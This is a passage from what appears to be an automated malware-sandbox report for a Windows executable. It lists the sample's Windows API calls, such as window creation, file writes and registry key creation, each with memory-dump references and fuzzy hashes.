                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Virtual$AllocFree
                                                            • String ID:
                                                            • API String ID: 2087232378-0
                                                            • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                            • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                            • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                            • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                            APIs
                                                            • GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
                                                              • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
                                                              • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                            • String ID:
                                                            • API String ID: 1658689577-0
                                                            • Opcode ID: 2ab4847006ef9acfce6ccb5f1f64a91e8b74d27154e4f0e7901e4566ca639e1f
                                                            • Instruction ID: ea6634d2ed8774f5e90a5a6f355d63bed973dafba18e0ec7d48b30ffe24ea089
                                                            • Opcode Fuzzy Hash: 2ab4847006ef9acfce6ccb5f1f64a91e8b74d27154e4f0e7901e4566ca639e1f
                                                            • Instruction Fuzzy Hash: C4314375E001199BCF01DF95C8819EEB7B9FF84314F15857BE815AB286E738AE018B98
                                                            APIs
                                                            • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: InfoScroll
                                                            • String ID:
                                                            • API String ID: 629608716-0
                                                            • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                            • Instruction ID: 2c7078d87c5cd90d2d28a279248f0ceb63a34b6d02ec849610dd04de18f9c6e3
                                                            • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                            • Instruction Fuzzy Hash: AA213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6
                                                            APIs
                                                              • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                              • Part of subcall function 0041EEB4: 73EA5940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                            • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C756,?,00000000,?,?,0046C968,?,00000000,0046C9DC), ref: 0046C73A
                                                              • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
                                                              • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Window$A5940CurrentEnablePathPrepareThreadWrite
                                                            • String ID:
                                                            • API String ID: 3104224314-0
                                                            • Opcode ID: 7310e4a240e1736cfb30b9abd7a9c8d32e29debdd45fb2130da0edd2c14fc99c
                                                            • Instruction ID: 552ca42e7a4f22222615ff1de8f8c20df724e6475abae56b3c63f202feb1ec23
                                                            • Opcode Fuzzy Hash: 7310e4a240e1736cfb30b9abd7a9c8d32e29debdd45fb2130da0edd2c14fc99c
                                                            • Instruction Fuzzy Hash: 28F0E270248300FFEB059BB2EDD6B2577E8E319716F91043BF504866D0EA795D40C96E
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                            • Instruction ID: d0e136ad155d69288fc423feb27b218c22c44688115b59a91c3ffefc647f2292
                                                            • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                            • Instruction Fuzzy Hash: F0F0FF70509209DBBB1CCF54D0919AF7B71EB59310F20806FE907877A0D6346A80D759
                                                            APIs
                                                            • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                            • Instruction ID: 39ad6e161323637dbb8254467e02d50acedd081d31d6b9d15e1adfc5f54150e8
                                                            • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                            • Instruction Fuzzy Hash: 6EF02BB2200510AFDB84CF9CD9C0F9373ECEB0C210B0481A6FA08CF24AD220EC108BB0
                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                            • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                            • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                            • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                            APIs
                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004507F0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 838f498b19bb2aafec3be0ee987651bf511c4e6d2f63907cf4f88042037e4973
                                                            • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                            • Opcode Fuzzy Hash: 838f498b19bb2aafec3be0ee987651bf511c4e6d2f63907cf4f88042037e4973
                                                            • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                            APIs
                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD24,?,00000001,?,?,00000000,?,0042CD76,00000000,00452A11,00000000,00452A32,?,00000000), ref: 0042CD07
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: a570e9d0cc49cd9ea48ac8d9958fbde071fca7bece3969a5989dcb135d147aed
                                                            • Instruction ID: bebe06870d533199fa05ec681e6f815a7bc371a3e359dcca221b2f893a48d47d
                                                            • Opcode Fuzzy Hash: a570e9d0cc49cd9ea48ac8d9958fbde071fca7bece3969a5989dcb135d147aed
                                                            • Instruction Fuzzy Hash: 0AE06571304308BFD701EB62EC92A5EBBECD749714B914476B400D7592D5B86E008458
                                                            APIs
                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: FormatMessage
                                                            • String ID:
                                                            • API String ID: 1306739567-0
                                                            • Opcode ID: 1d16c149c237ab05d394d1dcd15bc1a2ba242a73302d35381885c392630e106f
                                                            • Instruction ID: 1e04b5e42f682bd3307758a00633d1e15c64123c11c882a5e2d093d9edca25ee
                                                            • Opcode Fuzzy Hash: 1d16c149c237ab05d394d1dcd15bc1a2ba242a73302d35381885c392630e106f
                                                            • Instruction Fuzzy Hash: E7E0D86178432126F23524166C43B7B110E43C0704FD080267A809F3D6D6EE9949425E
                                                            APIs
                                                            • CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                            • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                            • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                            • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                            APIs
                                                            • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: b59592ccec0b1853c0d50eb209755673f49d30f0d63234ebc8c06611609486a1
                                                            • Instruction ID: 00bf656f3cc58d957e3fc120c7d975a7f6f089e768df8f95d2ce2a55afbcf34e
                                                            • Opcode Fuzzy Hash: b59592ccec0b1853c0d50eb209755673f49d30f0d63234ebc8c06611609486a1
                                                            • Instruction Fuzzy Hash: 69E07EB2600119AF9B40DE8CDC81EEB37ADAB1D350F414016FA08E7200C274EC519BB4
                                                            APIs
                                                            • FindClose.KERNEL32(00000000,000000FF,00470C14,00000000,00471A10,?,00000000,00471A59,?,00000000,00471B92,?,00000000,?,00000000), ref: 00454BFA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseFind
                                                            • String ID:
                                                            • API String ID: 1863332320-0
                                                            • Opcode ID: cdb9c2b7633e0d7853738bb459b1a46babdaf032508dd36dba6af5da7df12373
                                                            • Instruction ID: 3c3cb6916585ff7422749358fc170cdffb6a73b651657da6609ae8be1e4b77d0
                                                            • Opcode Fuzzy Hash: cdb9c2b7633e0d7853738bb459b1a46babdaf032508dd36dba6af5da7df12373
                                                            • Instruction Fuzzy Hash: A7E065B0A056004BCB15DF3A858021A76D25FC5325F05C96AAC58CF397D63C84955656
                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(004953B6,?,004953D8,?,?,00000000,004953B6,?,?), ref: 004146AB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                            • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                            • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                            • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                            APIs
                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                            • Instruction ID: 1f586823f232578dbf745533d190da316c23ef772c10fc749b20f2ce5ea51255
                                                            • Opcode Fuzzy Hash: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                            • Instruction Fuzzy Hash: E0D05B723091117AD620955F6C44DA76BDCCBC5770F11063EB558D72C1D7309C01C675
                                                            APIs
                                                              • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
                                                            • ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                              • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$ShowWindow
                                                            • String ID:
                                                            • API String ID: 3202724764-0
                                                            • Opcode ID: 6539159081c566a845655d997cb077fb8df4a929aa301bd67fb88950e555413a
                                                            • Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
                                                            • Opcode Fuzzy Hash: 6539159081c566a845655d997cb077fb8df4a929aa301bd67fb88950e555413a
                                                            • Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC
                                                            APIs
                                                            • SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: TextWindow
                                                            • String ID:
                                                            • API String ID: 530164218-0
                                                            • Opcode ID: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                            • Instruction ID: 772c2b490b6417829154bcce5d0a54014a2db275ddfc333997dbbca6f26d49c5
                                                            • Opcode Fuzzy Hash: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                            • Instruction Fuzzy Hash: 7ED05EE27011702BCB01BAED54C4AC667CC9B8825AB1940BBF904EF257C678CE4083A8
                                                            APIs
                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,004515B7,00000000), ref: 0042CD3F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 25b3c26d3c79b78b40e0be7c0404abf70c39e9d787657ef1c43052f1caeba7d8
                                                            • Instruction ID: 866207c2a99293721dc17515f5e31636ca325c5e587501d47fbe5ff4e718b97c
                                                            • Opcode Fuzzy Hash: 25b3c26d3c79b78b40e0be7c0404abf70c39e9d787657ef1c43052f1caeba7d8
                                                            • Instruction Fuzzy Hash: 77C08CE03222001A9A20A6BD2CC950F06CC891437A3A41F77B439E72E2D23DD8162018
                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467B94,00000000,00000000,00000000,0000000C,00000000), ref: 00466EC4
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                            • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                            • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                            • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                            APIs
                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5
